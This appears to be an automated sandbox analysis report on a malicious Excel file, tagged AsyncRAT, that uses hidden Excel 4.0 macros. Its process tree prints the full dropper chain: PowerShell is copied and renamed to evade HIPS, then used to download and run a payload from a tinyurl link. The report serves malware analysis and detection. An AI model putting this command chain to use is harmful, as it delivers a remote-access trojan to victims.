Play interactive tour

Edit tour

Analysis Report 1099008FEDEX_090887766.xls

Overview

General Information

Sample Name:	1099008FEDEX_090887766.xls
Analysis ID:	320331
MD5:	069451376c805d4b4d21fdc34a5e58ba
SHA1:	5e8897fa3ee53ac8a1f010e01ea4ec5c2b3dbed5
SHA256:	dc2be755822676a5ec7e406876c100efaf4983272e57a52469d5f0f788f55b82
Tags:	AsyncRATRATxls
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Connects to a URL shortener service

Document exploit detected (process start blacklist hit)

Drops PE files to the document folder of the user

Found Excel 4.0 Macro with suspicious formulas

Obfuscated command line found

Renames powershell.exe to bypass HIPS

Sigma detected: Microsoft Office Product Spawning Windows Shell

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains capabilities to detect virtual machines

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query locales information (e.g. system language)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains embedded VBA macros

Drops PE files

Enables debug privileges

Enables security privileges

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 1960 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

cmd.exe (PID: 2536 cmdline: cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

Robocopy.exe (PID: 2712 cmdline: robocopy C:\Windows\system32\WindowsPowerShell\v1.0\ C:\Users\user\AppData\Local\Temp powershell.exe /mt /z MD5: 0A551CCDEF9D6F99A008B5B075354650)

cmd.exe (PID: 2504 cmdline: cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

timeout.exe (PID: 2896 cmdline: timeout /t 1 MD5: 68A0A50CCAD87E1EE1944410A96D066C)

cmd.exe (PID: 2832 cmdline: cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

cmd.exe (PID: 2904 cmdline: cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

o.exe (PID: 2848 cmdline: C:\Users\user\AppData\Local\Temp\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 824 cmdline: cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

o.exe (PID: 2780 cmdline: C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 7; Move-Item 'vc.exe' -Destination '$env:appdata' MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 3048 cmdline: cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe; MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

o.exe (PID: 1976 cmdline: C:\Users\user\AppData\Local\Temp\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe; MD5: 852D67A27E454BD389FA7F02A8CBE23F)

vc.exe (PID: 1192 cmdline: C:\Users\user\AppData\Roaming\vc.exe MD5: BB7C0DFD8ECC7EEBCE937A232608695F)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
1099008FEDEX_090887766.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x10bc2:$s1: Excel 0x32b0:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit, CommandLine: cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1960, ProcessCommandLine: cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit, ProcessId: 2536

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: 1099008FEDEX_090887766.xls	ReversingLabs: Detection: 14%
Source: 1099008FEDEX_090887766.xls	ReversingLabs: Detection: 14%

Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8A3C4 malloc,ExpandEnvironmentStringsW,FindFirstFileW,FindClose,free,
Source: C:\Users\user\AppData\Local\Temp\o.exe	Code function: 16_2_000000013FB8A3C4 malloc,ExpandEnvironmentStringsW,FindFirstFileW,FindClose,free,

Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\powershell.exe
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\powershell.exe
Source: C:\Windows\System32\cmd.exe	File opened: C:\Users\user\

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe

Source: global traffic	DNS query: name: tinyurl.com
Source: global traffic	DNS query: name: tinyurl.com

Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.20.138.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.20.138.65:443

Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.20.138.65:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.20.138.65:443

Networking:

Connects to a URL shortener service

Show sources

Source: unknown	DNS query: name: tinyurl.com
Source: unknown	DNS query: name: tinyurl.com
Source: unknown	DNS query: name: tinyurl.com
Source: unknown	DNS query: name: tinyurl.com

Source: Joe Sandbox View	IP Address: 104.20.138.65 104.20.138.65
Source: Joe Sandbox View	IP Address: 104.20.138.65 104.20.138.65
Source: Joe Sandbox View	IP Address: 162.159.134.233 162.159.134.233

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d

Source: Robocopy.exe, 00000007.00000002.2109596279.0000000002130000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: o.exe, 00000010.00000002.2132406235.0000000000387000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: Robocopy.exe, 00000007.00000002.2109596279.0000000002130000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: o.exe, 00000010.00000002.2132406235.0000000000387000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown	DNS traffic detected: queries for: tinyurl.com
Source: unknown	DNS traffic detected: queries for: tinyurl.com

Source: o.exe, 00000010.00000003.2131439374.000000001D153000.00000004.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: o.exe, 00000010.00000003.2131439374.000000001D153000.00000004.00000001.sdmp	String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: o.exe, 00000010.00000002.2140064624.000000001B7A8000.00000004.00000001.sdmp	String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: o.exe, 00000010.00000002.2141296727.000000001D137000.00000004.00000001.sdmp	String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: o.exe, 00000010.00000003.2131491172.000000001B7FF000.00000004.00000001.sdmp	String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncRSACA-2.crt0
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: o.exe, 00000010.00000002.2141086169.000000001D0C7000.00000004.00000001.sdmp	String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: Robocopy.exe, 00000007.00000002.2109190938.0000000001D50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: o.exe, 00000010.00000002.2141397608.000000001D155000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0r
Source: o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crl0
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: o.exe, 00000010.00000003.2131375708.000000001D0DA000.00000004.00000001.sdmp	String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: o.exe, 00000010.00000003.2131375708.000000001D0DA000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncRSACA-2.crl07
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncRSACA-2.crl0L
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: http://crt.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crt0%
Source: o.exe, 00000010.00000002.2132356801.000000000034B000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp, o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp, o.exe, 00000010.00000003.2129295825.000000001D0EF000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: o.exe, 00000010.00000002.2140172130.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: o.exe, 00000010.00000002.2140172130.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: o.exe, 00000010.00000002.2140172130.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: o.exe, 00000010.00000003.2131250220.000000001D13E000.00000004.00000001.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: Robocopy.exe, 00000007.00000002.2109596279.0000000002130000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: Robocopy.exe, 00000007.00000002.2109596279.0000000002130000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: Robocopy.exe, 00000007.00000002.2109736701.0000000002317000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140674807.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: Robocopy.exe, 00000007.00000002.2109736701.0000000002317000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140674807.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca4.com0
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: o.exe, 00000010.00000002.2139864202.000000001B710000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: o.exe, 00000010.00000002.2137561271.000000000365B000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.gva.es0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: o.exe, 00000010.00000003.2131375708.000000001D0DA000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: Robocopy.exe, 00000007.00000002.2110204380.0000000002A40000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2133317799.0000000002530000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: o.exe, 00000010.00000002.2141573754.000000001D2B0000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: Robocopy.exe, 00000007.00000002.2109736701.0000000002317000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140674807.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: Robocopy.exe, 00000007.00000002.2109190938.0000000001D50000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: Robocopy.exe, 00000007.00000002.2109190938.0000000001D50000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: Robocopy.exe, 00000007.00000002.2109736701.0000000002317000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140674807.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: Robocopy.exe, 00000007.00000002.2110204380.0000000002A40000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2133317799.0000000002530000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	String found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	String found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	String found in binary or memory: http://www.a-cert.at0E
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: o.exe, 00000010.00000002.2140064624.000000001B7A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: o.exe, 00000010.00000002.2141054161.000000001D0B0000.00000004.00000001.sdmp	String found in binary or memory: http://www.certifikat.dk/repository0
Source: o.exe, 00000010.00000003.2131491172.000000001B7FF000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: o.exe, 00000010.00000002.2140121697.000000001B7D5000.00000004.00000001.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: o.exe, 00000010.00000003.2131354249.000000001B80A000.00000004.00000001.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: o.exe, 00000010.00000002.2140172130.000000001B80E000.00000004.00000001.sdmp	String found in binary or memory: http://www.comsign.co.il/cps0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.crc.bg0
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: o.exe, 00000010.00000002.2140008964.000000001B770000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: o.exe, 00000010.00000003.2131491172.000000001B7FF000.00000004.00000001.sdmp	String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: o.exe, 00000010.00000002.2140064624.000000001B7A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: o.exe, 00000010.00000002.2140064624.000000001B7A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.disig.sk/ca0f
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.dnie.es/dpc0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-me.lv/repository0
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: o.exe, 00000010.00000003.2131413940.000000001D0B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: o.exe, 00000010.00000002.2141122352.000000001D0D7000.00000004.00000001.sdmp	String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: o.exe, 00000010.00000003.2131375708.000000001D0DA000.00000004.00000001.sdmp	String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: o.exe, 00000010.00000003.2131491172.000000001B7FF000.00000004.00000001.sdmp	String found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: Robocopy.exe, 00000007.00000002.2109190938.0000000001D50000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	String found in binary or memory: http://www.firmaprofesional.com0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.globaltrust.info0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.globaltrust.info0=
Source: Robocopy.exe, 00000007.00000002.2109596279.0000000002130000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: Robocopy.exe, 00000007.00000002.2109736701.0000000002317000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140674807.000000001CEB7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: Robocopy.exe, 00000007.00000002.2109190938.0000000001D50000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: o.exe, 00000010.00000003.2131231546.000000001D12F000.00000004.00000001.sdmp	String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: Robocopy.exe, 00000007.00000002.2109596279.0000000002130000.00000002.00000001.sdmp, o.exe, 00000010.00000002.2140328922.000000001CCD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: o.exe, 00000010.00000002.2132305351.00000000002FE000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: o.exe, 00000010.00000002.2141086169.000000001D0C7000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0%
Source: o.exe, 00000010.00000003.2131264005.000000001D0C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
